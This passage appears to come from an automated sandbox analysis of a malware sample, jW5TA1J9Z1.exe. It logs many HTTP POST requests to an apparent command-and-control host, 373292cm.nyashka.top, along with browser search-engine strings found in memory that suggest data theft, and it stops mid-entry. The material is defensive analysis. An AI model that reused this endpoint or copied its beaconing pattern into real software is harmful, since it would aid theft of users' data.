                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1868Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1868Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1868Expect: 100-continueConnection: Keep-Alive
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: 373292cm.nyashka.top
                              Source: unknownHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyPZ
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002AA4000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.00000000029CC000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002F28000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002DDD000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.00000000028D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2519392668.00000000028D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top/
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002AA4000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.00000000029CC000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002F28000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002DDD000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.00000000028D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
                              Source: jW5TA1J9Z1.exe, 00000000.00000002.1293145015.0000000003547000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.00000000028D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmp, A31r3hNHGH.23.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmp, A31r3hNHGH.23.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmp, A31r3hNHGH.23.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmp, A31r3hNHGH.23.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmp, A31r3hNHGH.23.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 